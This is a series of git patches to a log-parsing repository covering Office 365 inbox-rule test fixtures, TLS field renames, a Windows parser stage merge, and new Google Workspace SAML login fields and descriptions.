"caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + }, + "expected": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-23T12:26:18Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}", + "RuleId": 4561233110666051585, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file From a4fd269ed55b824e5c811577722dce79d9611c29 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 12 Nov 2024 16:58:53 +0100 Subject: [PATCH 025/150] fix on linting --- Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +- Office 365/o365/_meta/fields.yml | 1 - Office 365/o365/ingest/parser.yml | 2 +- Office 365/o365/tests/operation_properties_01.json | 4 ++-- Office 365/o365/tests/operation_properties_02.json | 4 ++-- 5 files changed, 6 insertions(+), 7 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 39d179145..2a8b6655f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -273,7 +273,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' - + set_alert_evidence_fields: actions: - set: diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 190ce038e..02c13a28b 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -408,7 +408,6 @@ office365.logon_error: name: office365.logon_error type: keyword - office365.operation.properties: description: A list of objects describing the operation name: office365.operation.properties diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 879592c7b..b65d6f8e6 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -132,7 +132,7 @@ stages: {%- endfor -%} } filter: '{{json_event.message.get("OperationProperties") != None}}' - + - translate: dictionary: 0: "Regular" diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json index 8354f4415..790c6b45f 100644 --- a/Office 365/o365/tests/operation_properties_01.json +++ b/Office 365/o365/tests/operation_properties_01.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json index 7f11fadc3..3c91bcb5d 100644 --- a/Office 365/o365/tests/operation_properties_02.json +++ b/Office 365/o365/tests/operation_properties_02.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", From 2c5909d2a02678580e98ccee0e606360c9ca9b9a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 12 Nov 2024 17:01:51 +0100 Subject: [PATCH 026/150] Delete .vscode/settings.json Delete a unnecessary file --- .vscode/settings.json | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 .vscode/settings.json diff --git a/.vscode/settings.json b/.vscode/settings.json deleted file mode 100644 index b92839d53..000000000 --- a/.vscode/settings.json +++ /dev/null @@ -1,22 +0,0 @@ -{ - "workbench.colorCustomizations": { - "activityBar.activeBackground": "#65c89b", - "activityBar.background": "#65c89b", - "activityBar.foreground": "#15202b", - "activityBar.inactiveForeground": "#15202b99", - "activityBarBadge.background": "#945bc4", - "activityBarBadge.foreground": "#e7e7e7", - "commandCenter.border": "#15202b99", - "sash.hoverBorder": "#65c89b", - "statusBar.background": "#42b883", - "statusBar.foreground": "#15202b", - "statusBarItem.hoverBackground": "#359268", - "statusBarItem.remoteBackground": "#42b883", - "statusBarItem.remoteForeground": "#15202b", - "titleBar.activeBackground": "#42b883", - "titleBar.activeForeground": "#15202b", - "titleBar.inactiveBackground": "#42b88399", - "titleBar.inactiveForeground": "#15202b99" - }, - "peacock.color": "#42b883" -} \ No newline at end of file From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 13 Nov 2024 10:52:05 +0100 Subject: [PATCH 027/150] Fixing tls and tls_* fields --- GateWatcher/aioniq/_meta/fields.yml | 13 +++++++++---- GateWatcher/aioniq/ingest/parser.yml | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 7fb7e28af..07bae26e7 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,14 +384,19 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls.sni: +gatewatcher.tls: + description: This field contains all TLS data fields in a TLS metadata + name: gatewatcher.tls + type: text + +gatewatcher.tls_sni: description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls.sni + name: gatewatcher.tls_sni type: text -gatewatcher.tls.fingerprint: +gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata - name: gatewatcher.tls.fingerprint + name: gatewatcher.tls_fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index b71064e6d..3cc13d747 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -210,7 +210,8 @@ stages: tls.server.not_before: "{{json_load.message.tls.notbefore}}" tls.server.certificate_chain: "{{json_load.message.tls.chain}}" tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 15:45:33 +0100 Subject: [PATCH 028/150] refactor(Windows): merge source_ip and source_address into one stage --- Windows/windows/ingest/parser.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..f0bd6640b 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -153,8 +153,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -1106,7 +1105,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1130,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 15:56:25 +0100 Subject: [PATCH 029/150] Add saml seervice to the parser --- Google Cloud/google-report/_meta/fields.yml | 15 +++ .../_meta/smart-descriptions.json | 114 ++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++ .../tests/test_saml_login_success.json | 63 ++++++++++ .../tests/test_saml_login_success_1.json | 63 ++++++++++ 5 files changed, 275 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..ad86f9169 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -42,3 +42,18 @@ google.report.token.type: description: Token type name: google.report.token.type type: keyword + +google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..6fa8c709a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,120 @@ } ] }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": 